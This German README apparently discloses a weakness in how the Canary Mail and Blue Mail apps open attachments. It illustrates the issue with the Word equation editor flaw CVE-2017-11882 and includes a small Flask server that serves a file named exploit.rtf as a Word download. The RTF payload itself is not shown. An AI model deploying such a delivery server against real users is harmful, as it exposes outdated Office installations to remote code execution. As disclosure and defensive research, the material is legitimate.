
Unsicherer Umgang mit Anhängen bei Verwendung von Canary Mail oder Blue mail
Das Kernproblem ist nicht, dass Benutzer schädliche Anhänge öffnen, sondern dass Apps wie Canary Mail oder Blue Mail eine bequeme, aber unsichere Funktion zum Speichern oder Öffnen dieser Anhänge bereitstellen. Ich betrachte dies als eine Sicherheitslücke, die Benutzer Angreifern aussetzt.
Um das unsichere Öffnen von Office Word-Anhängen über das Dialogfeld "Öffnen mit" oder "Speichern unter" zu demonstrieren, wurde die Schwachstelle CVE-2017-11882 im Gleichungseditor für Office Word 16 und niedriger verwendet.
from flask import Flask, send_file, request
import logging
from datetime import datetime
app = Flask(__name__)
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
@app.before_request
def log_request_info():
logger.info(f'Request: {request.method} {request.url} from {request.remote_addr}')
@app.after_request
def log_response_info(response):
logger.info(f'Response: Status {response.status_code} for {request.url}')
return response
@app.route('/download')
def download_file():
try:
response = send_file('exploit.rtf', mimetype='application/msword', as_attachment=True)
logger.info('File download successful')
return response
except FileNotFoundError:
logger.error('File exploit.rtf not found')
return 'File not found', 404
if __name__ == '__main__':
app.run(debug=False, host='0.0.0.0', port=5000)
Eine potenzielle RCE für Benutzer, die veraltete Microsoft Office Word-Softwareversionen 16 und niedriger verwenden
Dieses Repository dient ausschließlich der Ausbildung und defensiven Sicherheitsforschung.